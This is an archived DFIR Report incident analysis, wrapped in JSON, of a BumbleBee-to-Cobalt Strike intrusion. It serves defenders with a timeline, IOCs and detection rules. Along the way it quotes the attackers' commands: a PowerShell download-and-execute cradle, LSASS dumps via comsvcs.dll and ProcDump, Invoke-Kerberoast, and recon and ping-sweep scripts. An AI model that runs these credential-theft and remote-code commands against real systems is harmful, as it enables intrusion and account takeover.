{
	"id": "ab30e782-5f92-44f7-94b5-6bddd530df68",
	"created_at": "2026-04-06T00:12:37.879252Z",
	"updated_at": "2026-04-10T13:13:08.998235Z",
	"deleted_at": null,
	"sha1_hash": "c2b59de92052209cbcb40bbe53c4c82efb43ed02",
	"title": "BumbleBee Roasts Its Way to Domain Admin - The DFIR Report",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 9198155,
	"plain_text": "BumbleBee Roasts Its Way to Domain Admin - The DFIR Report\r\nBy editor\r\nPublished: 2022-08-08 · Archived: 2026-04-05 18:07:31 UTC\r\nIn this intrusion from April 2022, the threat actors used BumbleBee as the initial access vector.\r\nBumbleBee is a malware loader that was first reported by Google Threat Analysis Group in March 2022. Google TAG attributes this malware to an initial access broker (IAB) dubbed EXOTIC LILY, working with the cybercrime group FIN12/WIZARD SPIDER/DEV-0193. Read more about BumbleBee here, and here.\r\nDuring this intrusion, the threat actors gained access using an ISO and LNK file, used several lateral movement techniques, dumped credentials three different ways, kerberoasted a domain admin account and dropped/executed a bespoke tool for discovering privilege escalation paths.\r\nThe DFIR Report Services\r\nPrivate Threat Briefs: Over 20 private DFIR reports annually.\r\nThreat Feed: Focuses on tracking Command and Control frameworks like Cobalt Strike, Metasploit, Sliver, etc.\r\nAll Intel: Includes everything from Private Threat Briefs and Threat Feed, plus private events, opendir reports, long-term tracking, data clustering, and other curated intel.\r\nPrivate Sigma Ruleset: Features 100+ Sigma rules derived from 40+ cases, mapped to ATT\u0026CK with test examples.\r\nDFIR Labs: Offers cloud-based, hands-on learning experiences, using real data, from real intrusions. Interactive labs are available with different difficulty levels and can be accessed on-demand, accommodating various learning speeds.\r\nContact us today for pricing or a demo!\r\nCase Summary\r\nIn this intrusion, the threat actors operated in an environment over an 11-day dwell period. 
The intrusion began with a password protected zipped ISO file which, based on other reports, we assess with medium to high confidence likely arrived via an email containing a link to download said zip file.\r\nThe execution phase started with that password protected zip which, after extraction, would show the user an ISO file. When the user double clicks the ISO, it mounts like a CD or external media device on Windows and presents the user with a single file named documents in the directory.\r\nWhen the user double clicks or opens the lnk file, they inadvertently start a hidden file, a DLL (namr.dll) containing the Bumblebee malware loader. From there, the loader reached out to the Bumblebee C2 servers. At first, things remained fairly quiet, with just C2 communications, until around 3 hours later, when Bumblebee dropped a Cobalt Strike beacon named wab.exe on the beachhead host. This Cobalt Strike beacon was subsequently executed and then proceeded to inject into various other processes on the host (explorer.exe, rundll32.exe). From these injected processes, the threat actors began discovery tasks using Windows utilities like ping and tasklist.\r\nFour hours after initial access, the threat actor used RDP to access a server using the local Administrator account. The threat actor then deployed AnyDesk, which was the only observed persistence mechanism used during the intrusion. The threat actor then started Active Directory discovery using AdFind.\r\nAfter this activity, the threat actors went silent. Then, the next day, they accessed the server via RDP and deployed a bespoke tool, VulnRecon, designed to identify local privilege escalation paths on a Windows host.\r\nThe next check-in from the threat actors occurred on the 4th day, when the threat actors again ran VulnRecon, but from the beachhead host instead of the server. AdFind was used again as well. 
Next, the threat actor transferred the Sysinternals tool ProcDump over SMB to the ProgramData folders on multiple hosts in the environment. They then used remote services to execute ProcDump, which was used to dump LSASS. At this point, the actors appeared to be searching for more access than they currently had. While they were able to move laterally to workstations and at least one server, it seemed that they had not yet taken control of an account that provided them the access they were seeking, likely a Domain Admin or similarly highly privileged account.\r\nAfter that activity, the threat actors disappeared until the 7th day, at which time they accessed the server via AnyDesk. Again, they executed VulnRecon and then also executed Seatbelt, a red team tool for performing various host based discovery.\r\nOn the final day of the intrusion, the 11th day since the initial entry by the threat actor, they appeared to be preparing to act on final objectives. The threat actors used PowerShell to download and execute a new Cobalt Strike PowerShell beacon in memory on the beachhead host. After injecting into various processes, the threat actors executed the PowerShell module Invoke-Kerberoast. Next, they used yet another technique to dump LSASS on the beachhead host, this time using a built-in Windows tool, comsvcs.dll. AdFind was run for a 3rd time in the network, and then two batch scripts were dropped and run. These batch scripts’ purpose was to identify all online servers and workstations in the environment, often a precursor to ransomware deployment, as it creates the target list for that deployment.\r\nhttps://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/\r\nPage 1 of 28\n\nAfter the scripts ran, a new Cobalt Strike executable beacon was run on the beachhead. Next, the threat actors used a service account to execute a Cobalt Strike beacon remotely on a Domain Controller. 
This service account had a weak password, which was most likely cracked offline after being kerberoasted earlier in the intrusion.\r\nThe threat actors were then evicted from the environment before any final actions could be taken. Based on the level of access and the discovery activity from the final day, we assess that the likely final action would have been a domain wide ransomware deployment.\r\nTimeline\r\nAnalysis and reporting completed by @0xtornado and @MetallicHack\r\nInitial Access\r\nThe threat actors managed to get access to the beachhead host after the successful execution of a lnk file within an ISO, a combination usually distributed through email campaigns.\r\nThe initial payload, named BC_invoice_Report_CORP_46.iso, is an ISO image that, once mounted, lures the user to open a document.lnk file which executes the malicious DLL loader using the following command line:\r\nC:\\Windows\\System32\\cmd.exe /c start rundll32 namr.dll,IternalJob\r\nRunning Eric Zimmerman’s tool LECmd revealed additional details related to the threat actors. The LNK metadata included the TA machine’s hostname, MAC address, and the LNK document creation date:\r\nExecution\r\nExecution of multiple payloads\r\nThe successful execution of the BumbleBee payload (namr.dll) resulted in the dropping and execution of several payloads using multiple techniques. 
The graph below shows all the payloads dropped by BumbleBee, the way they were executed, and the different processes they injected into:\r\nSysmon File Created event showing wab.exe created by rundll32.exe\r\nSysmon Event Code 1 showing wab.exe executed by WMI\r\nExecution of Cobalt Strike\r\nThe following PowerShell one-liner was executed from wab.exe during day 11, which downloaded obfuscated PowerShell and executed it in memory:\r\nC:\\Windows\\system32\\cmd.exe /C powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstrin\r\nSince the download took place over an unencrypted HTTP channel, the network traffic was plainly visible.\r\nThis payload can be deobfuscated using the following CyberChef recipe:\r\nRegular_expression('User defined','[a-zA-Z0-9+/=]{30,}',true,true,false,false,false,false,'List matches')\r\nFrom_Base64('A-Za-z0-9+/=',true)\r\nGunzip()\r\nLabel('Decode_Shellcode')\r\nRegular_expression('User defined','[a-zA-Z0-9+/=]{30,}',true,true,false,false,false,false,'List matches')\r\nConditional_Jump('',false,'',10)\r\nFrom_Base64('A-Za-z0-9+/=',true)\r\nXOR({'option':'Decimal','string':'35'},'Standard',false)\r\nOnce deobfuscated, we can spot the MZRE header, which is part of the default configuration of Cobalt Strike:\r\nOne of the easiest ways to extract valuable information from this shellcode is using Didier Stevens’ 1768.py tool:\r\nThe command and control server was hosted on (108.62.12[.]174/dofixifa[.]co). 
The full config extraction, detailing the Malleable C2 profile, is available in the Command and Control section.\r\nPersistence\r\nAnyDesk, installed as a service, was used in order to persist and create a backdoor into the network.\r\nPrivilege Escalation\r\nGetSystem\r\nThreat actors made a mistake by launching the getsystem command in the wrong console (shell console rather than the beacon console). The parent process of this command was C:\\Windows\\system32\\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc , a process which Cobalt Strike had injected into:\r\nC:\\Windows\\system32\\cmd.exe /C getsystem\r\nThis command is a built-in Cobalt Strike command that is used to get SYSTEM privileges. A detailed write-up of this feature is documented in the official Cobalt Strike blog and was also detailed in our Cobalt Strike, a Defender’s Guide blog post.\r\nValid Accounts\r\nThreat actors obtained and abused credentials of privileged domain accounts as a means of gaining privilege escalation on the domain. They also utilized local administrator accounts.\r\nA service account with Domain Admin permissions was used to create a remote service on a Domain Controller to move laterally.\r\nDefense Evasion\r\nProcess Injection\r\nThe process injection technique was used multiple times to inject into different processes. 
Almost every post-exploitation job was launched from an injected process.\r\nRight after its execution, the wab.exe process created two remote threads in order to inject code into explorer.exe and rundll32.exe:\r\nThreat actors also created a remote thread in svchost.exe:\r\nMultiple processes were then spawned by:\r\nC:\\Windows\\system32\\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc\r\nto perform various techniques (Enumeration, Credential dumping, etc.):\r\nA Yara scan of process memory using the Malpedia Cobalt Strike rule revealed the various injections across hosts.\r\nPid ProcessName CommandLine\r\n6832 explorer.exe C:\\Windows\\Explorer.EXE\r\n7476 svchost.exe C:\\Windows\\system32\\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc\r\n8088 wab.exe C:\\Users\\USER\\AppData\\Local\\wab.exe\r\n34296 rundll32.exe C:\\Windows\\system32\\rundll32.exe\r\n19284 powershell.exe “c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe” -Version 5.1 -s -NoLogo -NoProfile\r\n7316 svchost.exe C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\r\n7288 svchost.exe C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup -s WpnUserService\r\n20400 rundll32.exe C:\\Windows\\System32\\rundll32.exe\r\nIndicator Removal on Host: File Deletion\r\nWe observed the threat actors deleting their tools (ProcDump, network scanning scripts, etc.) 
from hosts.\r\nThe table below shows an example of ProcDump deletion from the ProgramData folder of all targeted workstations after dumping their LSASS process:\r\nCredential Access\r\nLSASS Dump\r\nMiniDump\r\nThreat actors dumped the LSASS process from the beachhead using the comsvcs.dll MiniDump technique via the C:\\Windows\\system32\\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc beacon:\r\ncmd.exe /C rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump 968 C:\\ProgramData\\REDACTED\\lsass.dmp full\r\nProcDump\r\nThreat actors also dropped procdump.exe and procdump64.exe on multiple workstations remotely, dumped LSASS, and deleted them from the ProgramData folder:\r\nThe ProcDump utility was executed on those workstations using the following command line:\r\nC:\\programdata\\procdump64.exe -accepteula -ma lsass.exe C:\\ProgramData\\lsass.dmp\r\nKerberoasting\r\nThe Invoke-Kerberoast command was executed from the beachhead through svchost.exe, a process which the threat actors had injected into:\r\nHere is an extract of PowerShell EventID 800 showing the Invoke-Kerberoast options used by threat actors, including the HashCat output format:\r\nIEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:36177/'); Invoke-Kerberoast -OutputFormat Hash\r\nRight after the execution of Invoke-Kerberoast, DC logs show that multiple Kerberos Service Tickets were requested from the beachhead host, with ticket encryption type set to 0x17 (RC4) and ticket options set to 0x40810000, for service accounts.\r\nAround 3 hours later, one of the service accounts logged into one of the Domain Controllers from the beachhead.\r\nWe assess with high confidence that the service account password was weak and cracked offline by threat 
actors.\r\nDiscovery\r\nReconnaissance\r\nSystem Information \u0026 Software Discovery\r\nThe following commands were launched by the wab.exe beacon:\r\nwhoami\r\nipconfig /all\r\ntasklist\r\nsysteminfo\r\nwmic product get name,version\r\nwmic /node:\u003cREDACTED\u003e process list brief\r\nnet view \\\\\u003cREDACTED\u003e\\Files$ /all\r\ndir \\\\\u003cREDACTED\u003e\\C$\\\r\nUsing the same beacon, wab.exe, tasklist was also used in order to enumerate processes on multiple hosts remotely:\r\ntasklist /v /s \u003cREMOTE_IP\u003e\r\nAdmin Groups and Domains Discovery\r\nAs we have already observed in multiple cases, the threat actors enumerated the local administrators group and the privileged domain administrator groups (Enterprise Admins and Domain Admins), mainly using the net command:\r\nnet use\r\nnet group \"Domain computers\" /dom\r\nnet group \"Enterprise admins\" /domain\r\nnet group \"domain admins\" /domain\r\nnet localgroup administrators\r\nnltest /dclist:\r\nnltest /domain_trusts\r\nping -n 1 \u003cREMOTE_IP\u003e\r\nOpsec mistake\r\nThreat actors failed at part of their tasks by executing a command in the wrong console:\r\nC:\\Windows\\System32\\rundll32.exe\r\n ➝ C:\\Windows\\system32\\cmd.exe /C shell whoami /all\r\nWe can assert with high confidence that the recon stage was not fully automated, and that threat actors manually executed commands and made a mistake in one of those.\r\nAdFind\r\nTo enumerate Active Directory, the threat actors executed AdFind from the beachhead host, on three different occasions:\r\nThe source of execution, the initiating parent process, was different on each occasion, and the name of the AdFind binary and the result files were different on one occasion, which could indicate multiple threat actors accessing the network.\r\nNetwork scanning\r\nThreat actors used two scripts named s.bat (for servers) and w.bat (for workstations) to ping the 
hosts and store the results in two log files:\r\ns.bat script:\r\n@echo off\r\nfor /f %%i in (servers.txt) do for /f \"tokens=2 delims=[]\" %%j in ('ping -n 1 -4 \"%%i\"') do @echo %%j \u003e\u003e serv\r\nw.bat script:\r\n@echo off\r\nfor /f %%i in (workers.txt) do for /f \"tokens=2 delims=[]\" %%j in ('ping -n 1 -4 \"%%i\"') do @echo %%j \u003e\u003e work\r\nBoth of those scripts were executed from the PowerShell Cobalt Strike beacon (powershell.exe).\r\nInvoke-ShareFinder\r\nInvoke-ShareFinder is a PowerShell module which is part of PowerView.\r\nInvoke-ShareFinder – finds (non-standard) shares on hosts in the local domain\r\nThreat actors performed share enumeration using Invoke-ShareFinder.\r\nIEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:39303/');\r\nInvoke-ShareFinder -CheckShareAccess -Verbose | Tee-Object ShareFinder.txt\r\nBecause rundll32.exe executed PowerShell, we can see that rundll32.exe created the ShareFinder.txt output file in C:\\ProgramData\\.\r\nSeatbelt\r\nThe tool Seatbelt was used by the threat actors on a server in order to discover potential security misconfigurations.\r\nSeatbelt is a C# project that performs a number of security oriented host-survey “safety checks” relevant from both offensive and defensive security perspectives.\r\nThreat actors performed a full reconnaissance by specifying the flag -group=all :\r\nSeatbelt.exe -group=all -outputfile=\"C:\\ProgramData\\seatinfo.txt\"\r\nVulnRecon\r\nThreat actors dropped two binaries named vulnrecon.dll and vulnrecon.exe on two hosts. This is the first time we’ve observed this tool. 
This library seems to be a custom tool developed to assist threat actors with Windows local privilege escalation enumeration.\r\nvulnrecon.dll PDB: D:\\a\\_work\\1\\s\\artifacts\\obj\\win-x64.Release\\corehost\\cli\\apphost\\standalone\\Release\\apphos\r\nvulnrecon.exe PDB: D:\\work\\rt\\VulnRecon\\VulnRecon\\obj\\Release\\net5.0\\VulnRecon.pdb\r\nThe table below summarizes the capabilities of the tool:\r\nOption/Command | Details (from the code)\r\n‘v’ or “Vulnerability” | “Search for available vulnerabilities for using LPE tools” “Scans the operating system for vulnerabilities and displays a list of tools for a LPE”\r\n‘m’ or “MicrosoftUpdates” | “List of all installed microsoft updates” “Displays a list installed Microsoft updates”\r\n‘h’ or “HotFixes” | “List of installed hot fixes” “Displays a list of installed hot fixes”\r\n‘s’ or “SupportedCve” | “List of implemented tools for LPE “ “Displays list of implemented CVE for LPE”\r\n‘i’ or “SystemInfo” | “Display information about current Windows version “\r\nBelow is the list of all of the currently supported (or implemented) CVE enumeration via installed KBs mapping:\r\nThreat actors executed this tool on patient 0 with low-level privileges multiple times, and again on a server with Administrator privileges. 
Below are all the command lines run by the adversaries:\r\nLateral Movement\r\nLateral Tool Transfer\r\nUsing the Cobalt Strike beacon, the threat actors transferred the AnyDesk (1).exe file from the beachhead to a server:\r\nThe threat actors also transferred ProcDump from the beachhead to multiple workstations:\r\nRemote Services\r\nRemote Desktop Protocol\r\nThreat actors used explorer.exe, which they had previously injected into, to initiate a proxied RDP connection to a server:\r\nThreat actors performed the first lateral movement from the beachhead to the server using RDP with an Administrator account:\r\nThis first lateral movement was performed in order to drop and install AnyDesk.\r\nSMB/Windows Admin Shares\r\nRemote Service over RPC\r\nMultiple RPC connections were initiated from the rundll32.exe process which wab.exe had previously injected into:\r\nThese RPC connections targeted multiple hosts, including workstations, servers, and DCs.\r\nAs we can see with one server which was targeted, the win32 function CreateServiceA was used by the malware in order to create a remote service over RPC on the server.\r\nCobalt Strike built-in PsExec\r\nThreat actors used the built-in Cobalt Strike jump psexec command to move laterally. On each usage of this feature, a remote service was created with a random alphanumeric service name and service file name, e.g. “\u003c7-alphanumeric-characters\u003e.exe”.\r\nBelow is an example of the service edc603a that was created on a Domain Controller:\r\nThe account used to perform this lateral movement was one of the kerberoasted service accounts.\r\nThe service runs a rundll32.exe process without any arguments. 
This process was beaconing to (108.62.12[.]174/dofixifa[.]co), the second Cobalt Strike C2, used during the last day of this intrusion.\r\nWe observed this beacon performing various techniques (process injection into the svchost process via CreateRemoteThread, default named pipes, etc.).\r\nCommand and Control\r\nThe graph below shows all communications to malicious IP addresses made by the dropped payloads or by processes which threat actors injected into:\r\n142.91.3[.]109\r\n45.140.146[.]30\r\nAll the active BumbleBee command and control servers shared a common server configuration in regards to TLS setup.\r\nJA3: c424870876f1f2ef0dd36e7e569de906\r\nJA3s: 61be9ce3d068c08ff99a857f62352f9d\r\nCertificate: [76:28:77:ff:fe:26:5c:e5:c6:7a:65:01:09:63:44:6d:57:b7:45:f2 ]\r\nNot Before: 2022/04/12 06:33:52 UTC\r\nNot After: 2023/04/12 06:33:52 UTC\r\nIssuer Org: Internet Widgits Pty Ltd\r\nSubject Org: Internet Widgits Pty Ltd\r\nPublic Algorithm: rsaEncryption\r\nCobalt Strike\r\nCobalt Strike (CS) was extensively used during this intrusion. The threat actors used CS as the main Command and Control tool, dropped several payloads, and injected into multiple processes on different hosts.\r\nC2 Servers\r\nTwo CS C2 servers were used during this intrusion. 
The graph below shows beaconing activity over time, we can notice the\r\ncontinuous usage of the first C2 server (45.153.243[.]142/fuvataren[.]com) from day 1 and the second C2 server\r\n(108.62.12[.]174/dofixifa[.]co) during the last day of intrusion only (day 11):\r\nThe main beacon wab.exe:\r\n45.153.243[.]142\r\nfuvataren[.]com\r\nJA3: a0e9f5d64349fb13191bc781f81f42e1\r\nJA3s: ae4edc6faf64d08308082ad26be60767\r\nhttps://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/\r\nPage 20 of 28\n\nCertificate: [6c:54:cc:ce:ca:da:8b:d3:12:98:13:d5:85:52:81:8a:9d:74:4f:fb ]\r\nNot Before: 2022/04/15 00:00:00 UTC\r\nNot After: 2023/04/15 23:59:59 UTC\r\nIssuer Org: Sectigo Limited\r\nSubject Common: fuvataren.com [fuvataren.com ,www.fuvataren.com ]\r\nPublic Algorithm: rsaEncryption\r\nBelow is the Cobalt Strike configuration of this C2 exported from a sandbox analysis results:\r\naccess_type: 512\r\nbeacon_type: 2048\r\nhost: fuvataren.com,/rs.js\r\nhttp_header1: AAAAEAAAABBIb3N0OiBhbWF6b24uY29tAAAACgAAABFDb25uZWN0aW9uOiBjbG9zZQAAAAoAAAASQWNjZXB0OiBpbWFnZS9q\r\nhttp_header2: AAAAEAAAABBIb3N0OiBhbWF6b24uY29tAAAACgAAABFDb25uZWN0aW9uOiBjbG9zZQAAAAoAAAAVQWNjZXB0LUVuY29kaW5n\r\nhttp_method1: GET\r\nhttp_method2: POST\r\njitter: 6144\r\npolling_time: 5000\r\nport_number: 443\r\nsc_process32: %windir%\\syswow64\\rundll32.exe\r\nsc_process64: %windir%\\sysnative\\rundll32.exe\r\nstate_machine: MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC5eYxmuxksHBu5Hqtk11PJye1th52fYvmUXmFrL1vEIQs9+B5NI7a6bHb\r\nunknown1\r\n3.025605888e+09\r\nunknown2\r\nAAAABAAAAAIAAAJYAAAAAwAAAA8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nuri: /en\r\nuser_agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Ch\r\nwatermark: 1580103814\r\nThe PowerShell beacon:\r\n108.62.12[.]174\r\ndofixifa[.]co\r\nJA3: a0e9f5d64349fb13191bc781f81f42e1\r\nJA3s: ae4edc6faf64d08308082ad26be60767\r\nCertificate: 
[ec:57:c5:ca:b1:ca:fb:88:3e:ce:1d:f3:89:0c:91:e3:1d:0a:75:ec ]\r\nNot Before: 2022/03/26 00:00:00 UTC\r\nNot After: 2023/03/26 23:59:59 UTC\r\nIssuer Org: Sectigo Limited\r\nSubject Common: dofixifa.com [dofixifa.com ,www.dofixifa.com ]\r\nPublic Algorithm: rsaEncryption\r\nFull configuration extraction using 1768.py tool:\r\nConfig found: xorkey b'.' 0x00000000 0x000031e0\r\n0x0001 payload type 0x0001 0x0002 8 windows-beacon_https-reverse_https\r\n0x0002 port 0x0001 0x0002 443\r\n0x0003 sleeptime 0x0002 0x0004 5000\r\n0x0004 maxgetsize 0x0002 0x0004 2796542\r\n0x0005 jitter 0x0001 0x0002 48\r\n0x0007 publickey 0x0003 0x0100 30819f300d06092a864886f70d010101050003818d00308189028181\r\n0x0008 server,get-uri 0x0003 0x0100 'dofixifa.com,/ro'\r\n0x0043 DNS_STRATEGY 0x0001 0x0002 0\r\n0x0044 DNS_STRATEGY_ROTATE_SECONDS 0x0002 0x0004 -1\r\n0x0045 DNS_STRATEGY_FAIL_X 0x0002 0x0004 -1\r\n0x0046 DNS_STRATEGY_FAIL_SECONDS 0x0002 0x0004 -1\r\n0x000e SpawnTo 0x0003 0x0010 (NULL ...)\r\n0x001d spawnto_x86 0x0003 0x0040 '%windir%\\\\syswow64\\\\rundll32.exe'\r\n0x001e spawnto_x64 0x0003 0x0040 '%windir%\\\\sysnative\\\\rundll32.exe'\r\n0x001f CryptoScheme 0x0001 0x0002 0\r\n0x001a get-verb 0x0003 0x0010 'GET'\r\n0x001b post-verb 0x0003 0x0010 'POST'\r\n0x001c HttpPostChunk 0x0002 0x0004 0\r\nhttps://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/\r\nPage 21 of 28\n\n0x0025 license-id 0x0002 0x0004 0\r\n0x0026 bStageCleanup 0x0001 0x0002 1\r\n0x0027 bCFGCaution 0x0001 0x0002 0\r\n0x0009 useragent 0x0003 0x0100 'Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW\r\n0x000a post-uri 0x0003 0x0040 '/styles'\r\n0x000b Malleable_C2_Instructions 0x0003 0x0100\r\n Transform Input: [7:Input,4,2:338,3,8]\r\n Print\r\n Remove 338 bytes from begin\r\n BASE64\r\n NETBIOS lowercase\r\n0x000c http_get_header 0x0003 0x0200\r\n Const_host_header Host: gmw.cn\r\n Const_header Connection: close\r\n Build Metadata: [7:Metadata,8,3,2:wordpress_logged_in=,6:Cookie]\r\n 
NETBIOS lowercase\r\n BASE64\r\n Prepend wordpress_logged_in=\r\n Header Cookie\r\n0x000d http_post_header 0x0003 0x0200\r\n Const_host_header Host: gmw.cn\r\n Const_header Connection: close\r\n Const_header Accept-Encoding: gzip\r\n Const_header Content-Type: text/plain\r\n Build Output: [7:Output,15,3,4]\r\n XOR with 4-byte random key\r\n BASE64\r\n Print\r\n Build SessionId: [7:SessionId,3,2:__session__id=,6:Cookie]\r\n BASE64\r\n Prepend __session__id=\r\n Header Cookie\r\n0x0036 HostHeader 0x0003 0x0080 (NULL ...)\r\n0x0032 UsesCookies 0x0001 0x0002 1\r\n0x0023 proxy_type 0x0001 0x0002 2 IE settings\r\n0x003a TCP_FRAME_HEADER 0x0003 0x0080 '\\x00\\x04'\r\n0x0039 SMB_FRAME_HEADER 0x0003 0x0080 '\\x00\\x04'\r\n0x0037 EXIT_FUNK 0x0001 0x0002 0\r\n0x0028 killdate 0x0002 0x0004 0\r\n0x0029 textSectionEnd 0x0002 0x0004 155989\r\n0x002a ObfuscateSectionsInfo 0x0003 0x0020 '\\x00p\\x02\\x00á\\x0b\\x03\\x00\\x00\\x10\\x03\\x00 ·\\x03\\x00\\x0\r\n0x002b process-inject-start-rwx 0x0001 0x0002 4 PAGE_READWRITE\r\n0x002c process-inject-use-rwx 0x0001 0x0002 32 PAGE_EXECUTE_READ\r\n0x002d process-inject-min_alloc 0x0002 0x0004 12128\r\n0x002e process-inject-transform-x86 0x0003 0x0100 '\\x00\\x00\\x00\\x05\\x90\\x90\\x90\\x90\\x90'\r\n0x002f process-inject-transform-x64 0x0003 0x0100 '\\x00\\x00\\x00\\x05\\x90\\x90\\x90\\x90\\x90'\r\n0x0035 process-inject-stub 0x0003 0x0010 '2ÍAíð\\x81\\x0c[_I\\x8eßG1Ìm'\r\n0x0033 process-inject-execute 0x0003 0x0080 '\\x01\\x03\\x04'\r\n0x0034 process-inject-allocation-method 0x0001 0x0002 0\r\n0x0000\r\nGuessing Cobalt Strike version: 4.3 (max 0x0046)\r\nDefault named pipes\r\nThe threat actors used default CS configuration and default named pipes. 
Named pipes were created in order to establish communication between CS processes:\r\nIn this particular case, threat actors used default post-exploitation jobs, which have a pattern of postex_[0-9a-f]{4} .\r\nBelow is the full list of all default named pipes spotted during this intrusion:\r\n\\postex_0dde\r\n\\postex_3e9b\r\n\\postex_4008\r\n\\postex_4429\r\n\\postex_55f8\r\n\\postex_8248\r\n\\postex_8c73\r\n\\postex_972d\r\n\\postex_fc2e\r\nNamed pipes are commonly used by Cobalt Strike to perform various techniques. Here is a Guide to Named Pipes and Hunting for Cobalt Strike Pipes from one of our contributors @svch0st.\r\nAnyDesk\r\nAs mentioned before in the lateral tool transfer section, threat actors remotely dropped the AnyDesk binary on a server from the beachhead:\r\nA new service was created (Event ID 7045) upon the execution of the AnyDesk installer:\r\nAnyDesk logs, %ProgramData%\\AnyDesk\\ad_svc.trace and %AppData%\\AnyDesk\\ad.trace , show that it was used during Day 1 and Day 7 of this intrusion, using the local Administrator account each time. 
The usage of AnyDesk can be relatively easy to spot if you have the right logs (*.anydesk.com domains, AnyDesk user agent, etc.):\r\nThe usage of AnyDesk also triggered two ET signatures:\r\nET POLICY SSL/TLS Certificate Observed (AnyDesk Remote Desktop Software)\r\nET USER_AGENTS AnyDesk Remote Desktop Software User-Agent\r\nAgain, those are quick wins to add to your detection capabilities for detecting the usage of unauthorized remote administration tools, which are commonly used by ransomware operators.\r\nThe AnyDesk configuration file and the network logs revealed that the ID used was 159889039 and the source IP was 108.177.235.25 (LeaseWeb USA – Cloud Provider).\r\nImpact\r\nThere was no impact (exfiltration, data encryption, or destruction) during this intrusion. However, the observed TTPs show common cybercrime threat actor tradecraft which may have led to domain wide ransomware had the threat actors had enough 
time.\r\nIndicators\r\nFiles\r\nBC_invoice_Report_CORP_46.zip\r\n5226b7138f4dd1dbb9f6953bd75a320b\r\n6c87ca630c294773ab760d88587667f26e0213a3\r\nc1b8e9d77a6aea4fc7bed4a2a48515aa32a3922859c9091cecf1b5f381a87127\r\ndocument.lnk\r\n3466ffaf086a29b8132e9e10d7111492\r\n58739dc62eeac7374db9a8c07df7c7c36b550ce5\r\n90f489452b4fe3f15d509732b8df8cc86d4486ece9aa10cbd8ad942f7880075e\r\nnamr.dll\r\nf856d7e7d485a2fc5b38faddd8c6ee5c\r\nc68e4d5eaae99d6f0a51eec48ace79a4fede3c09\r\n2d67a6e6e7f95d3649d4740419f596981a149b500503cbc3fcbeb11684e55218\r\nwab.exe\r\nc68437cc9ed6645726119c12fdcb33e7\r\n7a3db4b3359b60786fcbdaf0115191502fcded07\r\n1cf28902be615c721596a249ca85f479984ad85dc4b19a7ba96147e307e06381\r\naf.exe\r\n9b02dd2a1a15e94922be3f85129083ac\r\n2cb6ff75b38a3f24f3b60a2742b6f4d6027f0f2a\r\nb1102ed4bca6dae6f2f498ade2f73f76af527fa803f0e0b46e100d4cf5150682\r\nVulnRecon.exe\r\n5839b4013cf6e25568f13d3fc4120795\r\nd9832b46dd6f249191e9cbcfba2222c1702c499a\r\neb4cba90938df28f6d8524be639ed7bd572217f550ef753b2f2d39271faddaef\r\nVulnRecon.dll\r\n951d017ba31ecc6990c053225ee8f1e6\r\na204f20b1c96c5b882949b93eb4ac20d4f9e4fdf\r\na9e90587c54e68761be468181e56a5ba88bac10968ff7d8c0a1c01537158fbe8\r\nCommandLine.dll\r\n3654f4e4c0858a9388c383b1225b8384\r\n974ffbfae36e9a41ac672f9793ce1bee18f2e670\r\nfa2b74bfc9359efba61ed7625d20f9afc11a7933ebc9653e8e9b1e44be39c455\r\nw.bat\r\nbba3ff461eee305c7408e31e427f57e6\r\n3300c0c05b33691ecc04133885b7fc9513174746\r\nhttps://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/\r\nPage 25 of 28\n\n59198ffaf74b0e931a1cafe78e20ebf0b16f3a5a03bb4121230a0c44d7b963d2\r\ns.bat\r\n4b78228c08538208686b0f55353fa3bf\r\n67707f863aa405a9b9a335704808c604845394bf\r\n5eb0b0829b9fe344bff08de80f55a21a26a53df7bd230d777114d3e7b64abd24\r\nNetwork\r\nBumbleBee\r\n142.91.3[.]109\r\n45.140.146[.]30\r\nCobalt Strike\r\n45.153.243[.]142\r\nfuvataren[.]com\r\n108.62.12[.]174\r\ndofixifa[.]com\r\nCobalt Strike Payload Hosting\r\n104.243.33[.]50\r\nDetections\r\nNetwork\r\nET 
POLICY OpenSSL Demo CA - Internet Widgits Pty (O)\r\nET POLICY SMB Executable File Transfer\r\nET RPC DCERPC SVCCTL - Remote Service Control Manager Access\r\nET POLICY SMB2 NT Create AndX Request For an Executable File\r\nET POLICY SSL/TLS Certificate Observed (AnyDesk Remote Desktop Software)\r\nET USER_AGENTS AnyDesk Remote Desktop Software User-Agent\r\n(Snort VRT) MALWARE-OTHER CobaltStrike powershell web delivery attempt\r\nSigma\r\nhttps://github.com/SigmaHQ/sigma/blob/d459483ef6bb889fb8da1baa17a713a4f1aa8897/rules/windows/file_event/file_event_win_iso_file_recent.yml\r\nhttps://github.com/SigmaHQ/sigma/blob/8bb3379b6807610d61d29db1d76f5af4840b8208/rules/windows/process_creation/proc_creation_win_rundll32\r\nhttps://github.com/SigmaHQ/sigma/blob/7f490d958aa7010f7f519e29bed4a45ecebd152e/rules/windows/process_creation/proc_creation_win_susp_pow\r\nhttps://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_process_dump_rundll32_comsvcs.yml\r\nYara\r\n/*\r\nYARA Rule Set\r\nAuthor: The DFIR Report\r\nDate: 2022-08-08\r\nIdentifier: BumbleBee Case 